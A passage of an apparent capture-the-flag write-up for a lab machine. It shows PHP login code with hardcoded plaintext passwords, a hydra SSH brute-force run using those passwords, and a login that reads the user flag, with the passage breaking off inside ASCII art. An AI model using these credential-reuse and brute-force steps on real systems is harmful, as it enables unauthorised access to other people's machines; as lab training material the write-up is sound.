Development\/\n(remote) sacagawea@apaches:\/home\/sacagawea\/Development$ ls -la\ntotal 68\ndrwxrwxr-x 7 sacagawea sacagawea  4096 Oct 10  2022 .\ndrwxr-xr-x 6 sacagawea sacagawea  4096 Jul 13  2023 ..\ndrwx------ 2 sacagawea sacagawea  4096 Oct  6  2022 admin\ndrwxrwxr-x 2 sacagawea sacagawea  4096 Oct 10  2022 css\ndrwxrwxr-x 2 sacagawea sacagawea  4096 Oct 10  2022 fonts\ndrwxrwxr-x 4 sacagawea sacagawea  4096 Oct 10  2022 images\n-rwxrwxr-x 1 sacagawea sacagawea 33940 Oct 10  2022 index.html\ndrwxrwxr-x 2 sacagawea sacagawea  4096 Oct 10  2022 js\n-rwxrwxr-x 1 sacagawea sacagawea   116 Oct 10  2022 robots.txt\n(remote) sacagawea@apaches:\/home\/sacagawea\/Development$ cd admin\n(remote) sacagawea@apaches:\/home\/sacagawea\/Development\/admin$ ls -la\ntotal 24\ndrwx------ 2 sacagawea sacagawea 4096 Oct  6  2022 .\ndrwxrwxr-x 7 sacagawea sacagawea 4096 Oct 10  2022 ..\n-rwx------ 1 sacagawea sacagawea  689 Oct  6  2022 1a-login.php\n-rwx------ 1 sacagawea sacagawea  724 Oct 24  2020 1b-login.css\n-rwx------ 1 sacagawea sacagawea  773 Oct 10  2022 2-check.php\n-rwx------ 1 sacagawea sacagawea  267 Nov  5  2021 3-protect.php\n(remote) sacagawea@apaches:\/home\/sacagawea\/Development\/admin$ cat 1a-login.php \n&lt;?php\n\/\/ (A) LOGIN CHECKS\nrequire &quot;2-check.php&quot;;\n\n\/\/ (B) LOGIN PAGE HTML ?&gt;\n&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n  &lt;head&gt;\n    &lt;title&gt;Login Apaches&lt;\/title&gt;\n    &lt;link href=&quot;1b-login.css&quot; rel=&quot;stylesheet&quot;&gt;\n  &lt;\/head&gt;\n  &lt;body&gt;\n    &lt;?php if (isset($failed)) { ?&gt;\n    &lt;div id=&quot;bad-login&quot;&gt;Invalid email or password.&lt;\/div&gt;\n    &lt;?php } ?&gt;\n\n    &lt;form id=&quot;login-form&quot; method=&quot;post&quot; target=&quot;_self&quot;&gt;\n      &lt;h1&gt;PLEASE SIGN IN&lt;\/h1&gt;\n      &lt;label for=&quot;user&quot;&gt;User&lt;\/label&gt;\n      &lt;input type=&quot;text&quot; name=&quot;user&quot; required\/&gt;\n      &lt;label 
for=&quot;password&quot;&gt;Password&lt;\/label&gt;\n      &lt;input type=&quot;password&quot; name=&quot;password&quot; required\/&gt;\n      &lt;input type=&quot;submit&quot; value=&quot;Sign In&quot;\/&gt;\n    &lt;\/form&gt;\n  &lt;\/body&gt;\n&lt;\/html&gt;\n(remote) sacagawea@apaches:\/home\/sacagawea\/Development\/admin$ cat 1b-login.css \n\/* (A) WHOLE PAGE *\/\nhtml, body { font-family: arial, sans-serif; }\n\n\/* (B) LOGIN FORM *\/\n#login-form {\n  padding: 20px;\n  background: #f2f2f2;\n  max-width: 320px;\n  margin: 0 auto;\n}\n#login-form h1 {\n  font-size: 1.5em;\n  margin: 0;\n  color: #9b9b8d;\n}\n#login-form label, #login-form input {\n  box-sizing: border-box;\n  display: block;\n  width: 100%;\n  margin-top: 10px;\n}\n#login-form input { padding: 10px; }\n#login-form input[type=submit] {\n  background: #ad4343;\n  color: #fff;\n  border: 0;\n  cursor: pointer;\n}\n\n\/* (C) INVALID LOGIN *\/\n#bad-login {\n  padding : 10px;\n  margin-bottom: 10px;\n  background: #ffe7e7;\n  border: 1px solid #ff3e3e;\n  color: #c10000;\n  font-weight: bold;\n}(remote) sacagawea@apaches:\/home\/sacagawea\/Development\/admin$ cat 2-check.php\n&lt;?php\n\/\/ (A) START SESSION\nsession_start();\n\n\/\/ (B) HANDLE LOGIN\nif (isset($_POST[&quot;user&quot;]) &amp;&amp; !isset($_SESSION[&quot;user&quot;])) {\n  \/\/ (B1) USERS &amp; PASSWORDS - SET YOUR OWN !\n  $users = [\n    &quot;geronimo&quot; =&gt; &quot;12u7D9@4IA9uBO4pX9#6jZ3456&quot;,\n    &quot;pocahontas&quot; =&gt; &quot;y2U1@8Ie&amp;OHwd^Ww3uAl&quot;,\n    &quot;squanto&quot; =&gt; &quot;4Rl3^K8WDG@sG24Hq@ih&quot;,\n    &quot;sacagawea&quot; =&gt; &quot;cU21X8&amp;uGswgYsL!raXC&quot;\n  ];\n\n  \/\/ (B2) CHECK &amp; VERIFY\n  if (isset($users[$_POST[&quot;user&quot;]])) {\n    if ($users[$_POST[&quot;user&quot;]] == $_POST[&quot;password&quot;]) {\n      $_SESSION[&quot;user&quot;] = $_POST[&quot;user&quot;];\n    }\n  }\n\n  \/\/ (B3) FAILED LOGIN FLAG\n  if (!isset($_SESSION[&quot;user&quot;])) { $failed 
= true; }\n}\n\n\/\/ (C) REDIRECT USER TO HOME PAGE IF SIGNED IN\nif (isset($_SESSION[&quot;user&quot;])) {\n  header(&quot;Location: index.php&quot;);\n  exit();\n}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404201410317.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404201410317.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240420135310301\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>SSH brute force<\/h3>\n<p>Found some plaintext passwords; try using them for a brute-force attempt:<\/p>\n<pre><code class=\"language-apl\">Geronimo\nSacagawea\nSquanto \nPocahontas\ngeronimo\nsacagawea\nsquanto \npocahontas<\/code><\/pre>\n<pre><code class=\"language-apl\">12u7D9@4IA9uBO4pX9#6jZ3456\ny2U1@8Ie&amp;OHwd^Ww3uAl\n4Rl3^K8WDG@sG24Hq@ih\ncU21X8&amp;uGswgYsL!raXC<\/code><\/pre>\n<p>Run the brute force:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ hydra -L user.txt -P pass.txt ssh:\/\/192.168.0.160 -t 16\nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-20 01:57:26\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the 
tasks: use -t 4\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 32 login tries (l:8\/p:4), ~2 tries per task\n[DATA] attacking ssh:\/\/192.168.0.160:22\/\n[22][ssh] host: 192.168.0.160   login: pocahontas   password: y2U1@8Ie&amp;OHwd^Ww3uAl\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-04-20 01:57:34<\/code><\/pre>\n<h4>Information gathering<\/h4>\n<p>Try logging in over SSH:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ ssh pocahontas@192.168.0.160\n\n                                                                        &gt;&gt;       &gt;======&gt;         &gt;&gt;           &gt;=&gt;    &gt;=&gt;    &gt;=&gt; &gt;=======&gt;   &gt;=&gt;&gt;=&gt;   \n                                                                       &gt;&gt;=&gt;      &gt;=&gt;    &gt;=&gt;      &gt;&gt;=&gt;       &gt;=&gt;   &gt;=&gt; &gt;=&gt;    &gt;=&gt; &gt;=&gt;       &gt;=&gt;    &gt;=&gt; \n                                                                      &gt;&gt; &gt;=&gt;     &gt;=&gt;    &gt;=&gt;     &gt;&gt; &gt;=&gt;     &gt;=&gt;        &gt;=&gt;    &gt;=&gt; &gt;=&gt;        &gt;=&gt;       \n                          ~                                          &gt;=&gt;  &gt;=&gt;    &gt;======&gt;      &gt;=&gt;  &gt;=&gt;    &gt;=&gt;        &gt;=====&gt;&gt;=&gt; &gt;=====&gt;      &gt;=&gt;     \n                    7~   ~&amp;.                                        &gt;=====&gt;&gt;=&gt;   &gt;=&gt;          &gt;=====&gt;&gt;=&gt;   &gt;=&gt;        &gt;=&gt;    &gt;=&gt; &gt;=&gt;             &gt;=&gt;  \n                    G!J !75!   ~G     :                            &gt;=&gt;      &gt;=&gt;  &gt;=&gt;         &gt;=&gt;      &gt;=&gt;   &gt;=&gt;   &gt;=&gt; &gt;=&gt;    &gt;=&gt; &gt;=&gt;       &gt;=&gt;    &gt;=&gt; \n                   ?~:B!. 5Y^!~^B. 
:~J&amp;                           &gt;=&gt;        &gt;=&gt; &gt;=&gt;        &gt;=&gt;        &gt;=&gt;    &gt;===&gt;   &gt;=&gt;    &gt;=&gt; &gt;=======&gt;   &gt;=&gt;&gt;=&gt;\n                 .GG?~    B^...PB?!^ ?5 .                         \n                7&amp;G:  7. JB7?7^..   ^&amp;P&amp;Y .7#                     If at first you don&#039;t succeed. Try, try again! Sometimes the second time returns more!              .GG.  ~J. ?@5:  :~.  Y@@@@??!?#                     \n             :#~  ~Y~  JJ  :77: .J&amp;@#57:  :&amp;!.~Y  .:              \n            :&amp;. ^P7  ^J::!7^.:!YJ!:....  Y@@@@@&amp;J5@!              \n            @7 Y5  :GP77~::~!~...:^:..:J#&amp;#GPJ!:.PG               \n           P@~B# ^B@G~^^!!~^^^^:...^7J7.       ^BP^?:             \n          ^@@@@@&amp;@#~7G5J7~::.:^~?JJ7~::^^~~~?B@@@@@&amp;              \n          &amp;J!7?P#@B@@@B!:!?77???7!~~!!?J5PPP5YJ??YPYJ~.           \n         ?P       :?B@&amp;#@#?7!^^~?55Y7^:..       .^?J5Y^           \n         ?B^^^::..    ~G&amp;@#YP#&amp;@B!....::::^~75B&amp;@@@@#G!           \n         :&amp;~J?P&amp;@@G?7!^..BG!~7B@#5J7!!7?JPGBB#BB&amp;&amp;@@B^            \n         !5 ##J?PY    :JP&amp;    .@&amp;G5JY5GG57^:...   .~YBJ           \n        ~5  :P7!^ ..^   ~@P~~~BB7^:.  .:~5G! .:!5B&amp;@G!!.          \n       .P      ~PGB#5   P:5!B&amp;7~:Y&amp;#&amp;B&amp;&amp;#GPY7!!?5B@@&amp;G:           \n       Y7   ^^ .5GGB!  5~!7:7!G:. 7B7?~^^?G#P!....:GP             \n       .~^JJ^   .     .G #..J ##!  J#~..:.  .7P#?^:.              \n          !Y:^. ?.    ~Y &amp;  7 PJ!P7^@@&amp;Y!^^.  .J&amp;Y                \n           P!         ~P @. : Y&amp;  5GPJ#??~~?#G!!!7.               \n           !?       ^?J&amp;.#J   B##: .  B7:.   5^                   \n            !!^.:!PP^  !G!&amp;.  5^7?J   ?#:~~^.:B^                  \n              .::..!?   .!JG. &amp;^  BG~.:@       .                  
\n                    JG!!^..5YYG5^ &amp;..~Y&amp;                          \n                   .G...^?~  .  JB!    .                          \n                   .G!7!:                                   \n\npocahontas@192.168.0.160&#039;s password: \nWelcome to Ubuntu 20.04 LTS (GNU\/Linux 5.4.0-128-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n  System information as of Sat 20 Apr 2024 05:58:29 AM UTC\n\n  System load:  0.1                Processes:               136\n  Usage of \/:   20.8% of 39.07GB   Users logged in:         1\n  Memory usage: 22%                IPv4 address for enp0s3: 192.168.0.160\n  Swap usage:   0%\n\n * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s\n   just raised the bar for easy, resilient and secure K8s cluster deployment.\n\n   https:\/\/ubuntu.com\/engage\/secure-kubernetes-at-the-edge\n\n143 updates can be installed immediately.\n2 of these updates are security updates.\nTo see these additional updates run: apt list --upgradable\n\nFailed to connect to https:\/\/changelogs.ubuntu.com\/meta-release-lts. 
Check your Internet connection or proxy settings\npocahontas@apaches:~$ <\/code><\/pre>\n<pre><code class=\"language-bash\">pocahontas@apaches:~$ ls -la\ntotal 40\ndrwxr-xr-x 4 pocahontas pocahontas  4096 Apr 20 05:57 .\ndrwxr-xr-x 6 root       root        4096 Oct  9  2022 ..\n-rw------- 1 pocahontas pocahontas     0 Oct 10  2022 .bash_history\n-rw-r--r-- 1 pocahontas pocahontas   220 Oct  9  2022 .bash_logout\n-rw-r--r-- 1 pocahontas pocahontas  3771 Oct  9  2022 .bashrc\ndrwx------ 2 pocahontas pocahontas  4096 Apr 20 05:57 .cache\ndrwxrwxr-x 3 pocahontas pocahontas  4096 Oct 10  2022 .local\n-rw-r--r-- 1 pocahontas pocahontas   807 Oct  9  2022 .profile\n-rw------- 1 pocahontas pocahontas 10267 Oct 10  2022 user.txt\npocahontas@apaches:~$ whoami;id\npocahontas\nuid=1003(pocahontas) gid=1003(pocahontas) groups=1003(pocahontas)\npocahontas@apaches:~$ cat user.txt \n  _____ _                      __                         _                 _            \n |  ___| | __ _  __ _    ___  \/ _|  _ __   ___   ___ __ _| |__   ___  _ __ | |_ __ _ ___ \n | |_  | |\/ _` |\/ _` |  \/ _ \\| |_  | &#039;_ \\ \/ _ \\ \/ __\/ _` | &#039;_ \\ \/ _ \\| &#039;_ \\| __\/ _` \/ __|\n |  _| | | (_| | (_| | | (_) |  _| | |_) | (_) | (_| (_| | | | | (_) | | | | || (_| \\__ \\\n |_|   |_|\\__,_|\\__, |  \\___\/|_|   | .__\/ \\___\/ \\___\\__,_|_| |_|\\___\/|_| |_|\\__\\__,_|___\/\n                |___\/              |_|                                                   \n\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&amp;*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%,........@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@@@@@%,,.*\/\/\/\/\/\/\/\/\/\/.@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@@\/,.  
.*(\/\/***\/\/\/\/\/\/.@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@%*.  , (\/\/\/\/. \/\/\/\/\/\/\/\/.@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@,....#(\/\/\/\/\/*\/\/\/*\/\/\/\/..@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@%.\/* (%%(\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@#. *\/\/\/##%#(\/\/\/\/\/\/\/\/\/\/\/\/\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@* , #**\/####(\/*\/\/\/**,*,\/\/.@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@#. . *..\/###%((\/\/\/\/,***,\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@(. ..,..(\/%%%##(\/\/\/\/\/\/\/\/\/%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@.,...\/.,,#\/\/\/\/\/\/\/*\/\/*,,...@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@%.*.,.@*.,%#\/\/\/\/\/\/\/\/\/\/,......@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@%.,..... ,*#(\/\/\/\/\/\/\/\/\/,.,...... 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@......#,,,,(*\/\/\/\/\/\/\/\/,,.,.........@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@ ..,(#*#\/*\/\/\/\/\/\/\/\/\/\/\/*%%#\/..........\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@\/(&amp;#%\/\/\/\/\/\/\/\/\/\/\/\/\/\/#%&amp;###((**\/\/\/,,..,...,.@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@\/#(\/\/#@&amp;&amp;&amp;&amp;%###(#%(&amp;##########(#*\/(\/\/\/(#(.,.,,,,,(,,%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@(%#\/\/\/\/\/\/\/\/\/((%&amp;%&amp;#\/\/\/*\/\/\/\/\/\/\/\/**%\/\/\/\/\/\/\/((,,,,,,,,,,,@%*,*&amp;@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@%%(*\/\/\/\/\/\/\/\/\/\/%%\/((\/\/\/\/\/##(*(((%\/\/\/\/\/\/\/\/\/\/((*.,,,,,*******\/@#*,,%@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@&amp;%#\/*%*%&amp;*\/\/\/\/*\/&amp;\/\/\/#(\/(.,\/\/\/\/(.#\/\/\/\/\/\/\/\/\/\/\/\/,,,,,*,**,*,*******%@%***%@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@%#**,.%\/*#\/%\/\/\/\/#(&amp;*\/**(#*%#,#*(\/\/\/\/\/\/\/\/\/\/*\/\/..,,,,\/(,,**,****,**,,(@@%,,@@@@@@@@@@@@@@\n@@@@@@@@@@@@@\/\/*(*&amp;&amp;#*\/%\/\/(,.(**(&amp;&amp;,%(&amp;,%##((,\/\/\/\/\/*\/*\/\/*\/,...,\/,,*,#,,,*,,,,,,,,,,,#@@@\/@@@@@@@@@@@\n@@@@@@@@@@@@@*&amp;&amp;%@&amp;*##&amp;*\/\/\/.(&amp;\/( &amp;* &amp;&amp;%%#((((((,\/*\/\/\/\/\/*\/\/\/,. ...,.,(,.(,,,,,,,,,,,,,,,,@@@@@@@@@@@@\n@@@@@@@@@@@@@\/%&amp;&amp;&amp;&amp;&amp;&amp;,@*%%@#,\/*&amp;&amp;%%%##(#\/\/\/\/\/@\/(..*\/\/\/\/\/\/\/\/\/.. .,....,..,..........,.....,@@@@@@@@@@\n@@@@@@@@@@@@@#*@@&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%%%%####((((((\/\/\/@((.  ,\/\/\/\/\/*\/\/\/,.. .......#....#...&amp;...,. ...@@@@@@@@@@\n@@@@@@@@@@@@@%#\/&amp;%%############(((((((\/\/\/\/\/%(\/......(\/\/\/\/\/\/\/\/ ... ...,........#...#., ....%@@@@@@@@@\n@@@@@@@@@@@@@#%(\/\/(#####(#######((((((\/(\/\/\/\/*...,....#\/\/\/\/\/\/\/*. ......*........ @...*,....(@@@@@@@@@\n@@@@@@@@@@@@@##\/\/\/\/(###########(#(((\/(\/\/\/((*....@...  #\/\/\/\/\/\/*.........,...  . 
..#@.. \/# .(@@@@@@@@@\n@@@@@@@@@@@@@##\/(((\/\/%#######(###((((\/\/(@\/*...  %.... .#\/\/\/\/\/\/\/ ........ ... ......@@...@(&amp;@@@@@@@@@\n@@@@@@@@\/\/**@%(\/\/\/\/%((%##########(((\/\/\/\/\/* .........\/...\/\/\/\/\/\/*,. ..,... .... .. ...\/@*..&amp;@@@@@@@@@@\n@@@@@@@*@@@@@*,\/\/(\/,\/\/,.&amp;########(((\/\/(\/\/\/......  .. ....*\/\/\/\/\/\/.........,...... ....*@@(@@@@@@@@@@@\n@@@@@@@@@@@@\/#\/\/\/\/%%#&amp;\/,*@###(####(*\/\/\/\/*((.......... ...*#\/\/\/\/\/\/.......... ..*.. .....@@@@@@@@@@@@@\n@@@@@@@@((&amp;\/,(\/\/\/*\/\/\/\/\/\/.(%@%%#(\/\/*\/((((((%%%,..(.. ......%\/\/\/\/\/\/*......,..... *...*.#@@@@@@@@@@@@@@\n@@@@@.@@@&amp;@%#\/\/.(\/,&amp;@@%%##(#(###(#((((((\/\/%%%((,*..&amp;......*#\/\/\/\/\/\/......*. ....,...(@@@@@@@@@@@@@@@@\n@@@@@@@@@@\/#(\/\/\/\/\/@@@(&amp;%########(#(((((\/(%%%%(\/\/\/*.*.,. ...*#\/\/\/\/\/*.,...*..*....@.@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@%#\/\/\/\/\/,@@@&amp;@%####(#####(##(((#%%%%(\/((((\/.. . ...\/#\/\/\/\/\/,....* ., ...@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@\/%\/\/\/\/\/\/@@@%&amp;&amp;%########(##(##(#%%%%#\/\/(\/((((*.......*\/\/\/\/\/\/........*@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@(#\/\/*\/\/@@@@(&amp;&amp;&amp;%###(###(####%&amp;&amp;%%%%#(\/((((((%*....  .*\/\/\/\/\/*...,(@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@&amp;%\/*\/\/\/@@@@@(&amp;&amp;%&amp;%#####((##%#&amp;&amp;%%%%((((((((((((*. 
.....*\/*\/\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@\/#\/\/*\/@@@@@@(&amp;&amp;&amp;&amp;%######(%%(&amp;%%%%%\/#((((((((\/(((\/@@@@@@@@\/\/\/\/*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@%(\/\/*@@@@@@##&amp;&amp;&amp;&amp;&amp;%######%@&amp;%%#%%(%(((((((((((@((@@@@@@@@@*\/\/\/*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@\/%\/\/\/@@@@@@@%@@@@&amp;&amp;&amp;&amp;&amp;%%#&amp;&amp;&amp;##%%%(&amp;(((((((((\/(\/@((*@@@@@@@@@*\/\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@#\/\/*@@@@@@@@@@@&amp;@&amp;&amp;&amp;&amp;&amp;(@@&amp;####%%&amp;&amp;((((((((\/\/\/((@((*@@@@@@@@@@\/\/\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@(\/\/@@@@@@@@@%@@@@@&amp;(@@&amp;%######(%&amp;((((((((((((((&amp;((\/@@@@@@@@*(\/**\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@*\/\/\/*@@@@@@@@@@@@@@@&amp;&amp;&amp;%%####(@&amp;(((((((#((((((\/((((*@@@@@@@(\/\/\/*\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@%\/\/\/\/\/@@@@@@@&amp;@@@@@&amp;&amp;&amp;&amp;%##%&amp;@#((((#((((((((((((((((*@@@@@@@(\/*\/\/\/,@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@%\/\/(\/\/@@@@@@#%&amp;@@@&amp;&amp;&amp;&amp;&amp;(@&amp;&amp;%(#((#####((((((((\/(#(((\/@@@@@@@(*,\/\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@(#\/,@%\/@@@@@&amp;@@@#@@#%&amp;@&amp;%((((#####(#(#(\/(%%%%%%%%%%(@@@@@@@\/\/@\/\/\/*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@*(\/@@%,@@@@@@@#&amp;&amp;&amp;(&amp;&amp;((#%#########\/####%#%##%%%%%%%(@@@@@@@@@@\/\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@\/\/*,@@@@@@@@@@@&amp;&amp;&amp;&amp;&amp;&amp;&amp;%%%#####(%%%%%#####(#(%%%%%%%(@@@@@@,,*,\/#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@%**\/**%@@@@@@@&amp;&amp;&amp;&amp;&amp;&amp;&amp;%%###\/%%#%%%##\/##%###\/##%%%%%(@@@@@@@*\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@&amp;,@@@@@@@@@#&amp;&amp;&amp;&amp;&amp;&amp;%%#%%#\/%%%####(\/#(*****,**(%&amp;%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@%&amp;&amp;&amp;&amp;&amp;%#&amp;%@#.%####(*******\/*****\/*\/(%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@%&amp;&amp;&amp;%%&amp;%%*%%\/#(*************\/\/*\/\/\/\/@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@&amp;&amp;&amp;&amp;(&amp;*,%##\/*\/**\/*\/\/\/\/\/*\/**\/\/\/\/\/\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@&amp;&amp;&amp;%&amp;\/%%#\/**\/\/\/\/\/\/*\/\/\/*\/\/*\/\/\/\/\/\/\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@(&amp;(%,.(##\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/,\/\/\/((\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@&amp;(%%(**((\/\/*\/\/\/\/\/\/\/\/\/\/\/*\/\/(((\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@(%#%***\/((\/\/\/*\/\/\/*\/\/\/\/***\/\/(\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@#@&amp;&amp;%*\/**#(\/\/\/\/\/\/*\/\/\/\/***,((@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@%&amp;&amp;%****%#(*\/\/**\/\/\/\/,***\/*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@(&amp;%#***\/%#(\/\/\/***\/\/******,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@%&amp;#\/**\/\/\/%\/\/\/**\/\/\/\/\/*******\/**@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@&amp;%******\/#\/\/\/\/\/*\/\/\/\/****\/\/\/*\/\/(\/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@&amp;(*\/\/**#\/#(\/\/\/\/\/\/\/**\/**\/*#%%#(\/\/\/*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@((****\/%(\/*\/\/\/\/\/\/\/*%\/\/\/#%%%%%(\/(\/*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@#*\/\/\/(%%#(\/(((\/\/((\/(\/((%*%%%#(\/\/\/\/(*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@(\/(\/%*%%#(%\/(\/\/(\/\/(\/\/(%(*%\/%\/*\/\/\/\/(@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@@\/%